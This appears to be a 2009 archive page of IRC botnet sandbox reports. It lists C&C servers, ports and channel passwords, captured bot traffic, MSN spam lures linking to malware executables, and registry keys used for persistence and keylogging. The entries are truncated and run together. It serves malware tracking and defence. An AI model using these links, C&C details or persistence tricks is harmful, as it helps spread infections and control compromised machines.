Month: December 2009

xx.nadnadzz.info:5190 Now talking in #mTopic On: [ #m ] [ =NuGITTP9xJfGNsT11y7ZTNlmnxwJ6cqiUAX70HX7sFxHUIpR833LVoJB7TaUK1Pzr6ddH/IiXKspDoGDbNVV2Gj3x/Y3qj1oQzyBsLjfUNELAMp ]Topic By: [ k1a3 ]Modes On: [ #m ] [ +smntSMCu ] Resolved : [xx.nadnadzz.info] To [67.43.236.67]

Remote Host Port Number92.240.234.164 3305 NICK P|hy4m13g8cUSER kv7ucu7y9 * 0 :USA|XP|601USERHOST P|hy4m13g8cMODE P|hy4m13g8cJOIN #mm RSAPRIVMSG #mm :+Cpiwe/Bec9E07RQ/c0vtb4S//EdYX/xXUDj093Z0X0JV7.c0puSW4.pimDm1LRefR1ZyBMf0vZEvo.KMXSW1c0M3m/Fwv310uA.y6/SUz0u/OGWL5.gwJqI.6pkc9.kty0t0KWEjq.nHZN20/qQ08.asyjW/qqA8J1QcT5G1 PASS secretpass Other details * The following ports were open in the system: Port Protocol Process69 UDP unwise_.exe (%FontsDir%unwise_.exe)1052 TCP unwise_.exe (%FontsDir%unwise_.exe)20620 TCP unwise_.exe (%FontsDir%unwise_.exe) Registry Modifications * The following Registry Keys were created: o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsWindowsUpdate o HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftMRTRead more...

83.217.70.132:443 Nick: rrzhkUsername: rrzhkJoined Channel: #spybot with Password chanpassPrivate Message to Channel #spybot: “Version:spybot1.2c cpu: 0MHz. ram: 127MB total, 28MB free 77% in use os: Windows XP [Service Pack 3] (5.1, build 2600). uptime: 0d 0h 9m. Date: 02:Jul:2009 Time: 14:21:37 Current user: Administrator IP:192.168.0.2 Hostname:pc Windir: C:WINDOWS Systemdir: C:WINDOWSsystem32”Private Message to Channel #spybot: “KeyloggerRead more...

Host Name IP Address79.172.162.116 79.172.162.116Outgoing connection to remote server: 79.172.162.116 TCP port 3085DNS LookupHost Name IP Address79.172.162.116 79.172.162.116Outgoing connection to remote server: 79.172.162.116 TCP port 3085Outgoing connection to remote server: 79.172.162.116 TCP port 3085Outgoing connection to remote server: 79.172.162.116 TCP port 3085Outgoing connection to remote server: 79.172.162.116 TCP port 3085 Registry Changes by all processesCreateRead more...

Remote Host Port Number208.98.57.48 2201 NICK rpvlutUSER vafssj “” “kgq” :vafssjPONG :FDFA11A9JOIN #unf mksPONG :irc.priv8net.com PASS MSMS Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{28ABC5C0-4FCB-11CF-AAX5-81CX1C635612}] + StubPath = “c:RECYCLERS-1-5-21-1482476501-1644491937-682003330-1013iseL2.exe” so that iseL2.exe runs every time Windows starts * TheRead more...

User Name: nvvltpHost Name: 0Server Name: Real Name: N00|172|USA|XPSP3|Jim|XMPassword: l33tNick Name: N00|172|USA|XPSP3|Jim|XMNon RFC Conform: 1ChannelName: #v3#Password: fuckdTopic Deleted: :Notice Message DeletedValue: :leaf2.kredkrew.net NOTICE AUTH :*** Looking up your hostname… load.h4ck.biz 98.30.184.56 * C&C Server: 98.30.184.56:53381 * Server Password: * Username: inzv * Nickname: N00|10|DEU|XPSP3|Administrator|FF * Channel: #v3# (Password: fuckd) * Channeltopic: second server from sameRead more...

bb1.th3kings.net 208.96.62.2 * C&C Server: 208.96.62.2:27034 * Server Password: * Username: XP-4565 * Nickname: [00|DEU|217387] * Channel: #!!kk!!# (Password: aaaaaaa) * Channeltopic: :.msn.msg Is this your Pictur? http://larvax.com/fotos.exe?= Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce “wextract_cleanup0” = rundll32.exe C:WINDOWSsystem32advpack.dll,DelNodeRunDLL32 “C:DOKUME~1ADMINI~1LOKALE~1TempIXP000.TMP”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Java Update” = fitnets.exe.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsRead more...

k2r.th3kings.net 208.96.62.2 * C&C Server: 208.96.62.2:27034 * Server Password: * Username: XP-2677 * Nickname: [00|DEU|401746] * Channel: #!!kk!!# (Password: aaaaaaa) * Channeltopic: :.msn.msg Is this your Pictur? http://larvax.com/fotos.exe?= Registry Changes by all processesCreate or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce “wextract_cleanup0” = rundll32.exe C:WINDOWSsystem32advpack.dll,DelNodeRunDLL32 “C:DOKUME~1ADMINI~1LOKALE~1TempIXP000.TMP”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Java Update” = buthass.exe.exeReads HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS”HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey”HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey”HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsRead more...

bub.th3kings.net 217.148.32.202 * C&C Server: 217.148.32.202:27034 * Server Password: * Username: XP-1568 * Nickname: [00|DEU|051548] * Channel: #!!kk!!# (Password: aaaaaaa) * Channeltopic: :.msn.msg Is this your Pictur? http://th3bestgirl.com/fotos.exe?= * Private Message Deleted o Value: :Cs!XP@yes.gov PRIVMSG #!!kk!!# :.login yeste o Value: :Cs!XP@yes.gov PRIVMSG #!!kk!!# :.msn.msg Is this your Pictur? http://th3bestgirl.com/chek.exe?= Registry Changes by all processesCreateRead more...

Remote Host Port Number199.71.215.177 51987 MODE pLagUe{USA}91936 -ixJOIN #PlaguePONG CancerTreatmentCenter.orgPRIVMSG #Plague :New PC Infected. * The following port was open in the system: Port Protocol Process1052 TCP raidhost.exe (%Windir%raidhost.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + raidhost = “raidhost.exe” so that raidhost.exe runs every time Windows starts Memory Modifications *Read more...